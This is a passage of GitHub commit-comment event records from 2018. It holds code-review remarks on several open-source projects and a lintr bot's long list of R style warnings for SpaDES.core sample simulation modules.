{"id":"7946416668","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"firebase/FirebaseUI-Android"},"payload":{"comment":{"id":29663047,"position":75,"line":714,"path":"auth/README.md","commit_id":"a97133bb606559de731fa2a4b73fd52ece9b5c24","created_at":"2018-07-10T21:14:48Z","updated_at":"2018-07-10T21:14:48Z","author_association":"NONE","body":"Typo. Some more documentation about this scenario would be greatly appreciated."}},"created_at":"2018-07-10T21:14:48Z"}
{"id":"7946419705","type":"CommitCommentEvent","actor":{"login":"fredkiefer"},"repo":{"name":"gnustep/libs-quartzcore"},"payload":{"comment":{"id":29663055,"position":45,"line":45,"path":"CAAppKitBridge/Source/NSView+CAMethods.m","commit_id":"77cd36a9a1c07c01286b394cd053cc51129a0adf","created_at":"2018-07-10T21:15:26Z","updated_at":"2018-07-10T21:15:26Z","author_association":"MEMBER","body":"You will need to either free an existing GSCAData here or set _wantsLayer to NO."}},"created_at":"2018-07-10T21:15:26Z"}
{"id":"7946421462","type":"CommitCommentEvent","actor":{"login":"PettitWesley"},"repo":{"name":"PettitWesley/amazon-ecs-cli"},"payload":{"comment":{"id":29663058,"position":27,"line":180,"path":"ecs-cli/modules/utils/compose/convert_task_definition.go","commit_id":"071da90aaded24cd207b905cb02e88d2e13d0f6a","created_at":"2018-07-10T21:15:48Z","updated_at":"2018-07-10T21:15:48Z","author_association":"OWNER","body":"This can't run inside `if ecsContainerDef != nil {` because then you can only set a healthcheck if the ECS Params file is present, which prevents people who have compose 3 w/o ecs params from using healthcheck. "}},"created_at":"2018-07-10T21:15:48Z"}
{"id":"7946423402","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"firebase/FirebaseUI-Android"},"payload":{"comment":{"id":29663062,"position":13,"line":415,"path":"auth/README.md","commit_id":"0393a69fbfc6604ff68236cd9a6653f021f5b424","created_at":"2018-07-10T21:16:11Z","updated_at":"2018-07-10T21:16:11Z","author_association":"NONE","body":"I don't know but a context isn't required on continueWithTask();\r\nYou may please update the docs again"}},"created_at":"2018-07-10T21:16:11Z"}
{"id":"7946424976","type":"CommitCommentEvent","actor":{"login":"ivucica"},"repo":{"name":"gnustep/libs-quartzcore"},"payload":{"comment":{"id":29663064,"position":45,"line":45,"path":"CAAppKitBridge/Source/NSView+CAMethods.m","commit_id":"77cd36a9a1c07c01286b394cd053cc51129a0adf","created_at":"2018-07-10T21:16:31Z","updated_at":"2018-07-10T21:16:31Z","author_association":"MEMBER","body":"I told @whiteShtef during code review that he can do this in a future PR. I'm on a call with him right now."}},"created_at":"2018-07-10T21:16:31Z"}
{"id":"7946427205","type":"CommitCommentEvent","actor":{"login":"SoManyHs"},"repo":{"name":"PettitWesley/amazon-ecs-cli"},"payload":{"comment":{"id":29663071,"position":27,"line":180,"path":"ecs-cli/modules/utils/compose/convert_task_definition.go","commit_id":"071da90aaded24cd207b905cb02e88d2e13d0f6a","created_at":"2018-07-10T21:16:59Z","updated_at":"2018-07-10T21:16:59Z","author_association":"NONE","body":"see line 165?"}},"created_at":"2018-07-10T21:16:59Z"}
{"id":"7946427511","type":"CommitCommentEvent","actor":{"login":"fredkiefer"},"repo":{"name":"gnustep/libs-quartzcore"},"payload":{"comment":{"id":29663074,"position":69,"line":69,"path":"CAAppKitBridge/Source/NSView+CAMethods.m","commit_id":"77cd36a9a1c07c01286b394cd053cc51129a0adf","created_at":"2018-07-10T21:17:03Z","updated_at":"2018-07-10T21:17:03Z","author_association":"MEMBER","body":"The code in this method is very similar to the one in the previous. Why not use a shared implementation with a parameter that flags whether it is the root layer?"}},"created_at":"2018-07-10T21:17:03Z"}
{"id":"7946428785","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29663078,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-10T21:17:19Z","updated_at":"2018-07-10T21:17:19Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-770](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-770).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-770-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-10T21:17:19Z"}
{"id":"7946429565","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29663080,"position":null,"line":null,"path":null,"commit_id":"abdee694ceed2b56edde8af0ae0b333bffca0170","created_at":"2018-07-10T21:17:28Z","updated_at":"2018-07-10T21:17:28Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should 